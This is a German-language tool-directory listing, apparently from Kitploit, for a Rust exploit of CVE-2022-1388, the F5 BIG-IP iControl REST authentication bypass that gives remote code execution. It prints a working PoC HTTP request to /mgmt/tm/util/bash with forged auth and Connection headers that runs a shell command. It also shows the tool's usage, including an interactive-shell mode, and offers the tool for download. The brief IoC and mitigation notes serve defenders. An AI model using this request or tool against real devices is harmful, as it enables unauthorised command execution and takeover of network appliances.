Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/aancw/cve-2022-1388-rs
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE geschrieben in Rust

Repository anzeigen
25vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-1388-rs

Scanner und interaktive Shell für CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE geschrieben in Rust

Zusammenfassung

Hier ist eine Übersicht über die notwendigen Bedingungen einer Anfrage zur Ausnutzung dieser Sicherheitslücke:

  • Der Connection-Header muss X-F5-Auth-Token enthalten
  • Der X-F5-Auth-Token-Header muss vorhanden sein
  • Der Host-Header muss localhost / 127.0.0.1 sein oder der Connection-Header muss X-Forwarded-Host enthalten
  • Der Auth-Header muss mit dem Admin-Benutzernamen und einem beliebigen Passwort gesetzt werden

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

LAB einrichten

  • Sie finden das Labor hier

Verwendung

root@kitploit:~
$ cve_2022_1308_rs -h CVE-2022-1388 PoC 1.0 Petruknisme <[email protected]> Scanner und interaktive Shell für CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE geschrieben in Rust USAGE: cve_2022_1388_rs [OPTIONS] --url <URL> OPTIONS: -h, --help Print help information -s, --shell This mode for accessing payload with interactive shell -u, --url <URL> F5 Big-IP target url -V, --version Print version information

Voraussetzungen

  • Rust
  • Cargo

IoCs

IOCs können in der Logdatei /var/log/audit gefunden werden. Nicht erkannte Befehle, die über den Endpunkt mgmt/tm/util/bash ausgeführt wurden, sollten Anlass zur Sorge geben.

Abhilfe

Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen durch Befolgen der Anweisungen im F5-Sicherheitshinweis

  • https://support.f5.com/csp/article/K23605346

Referenzen

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Tool herunterladen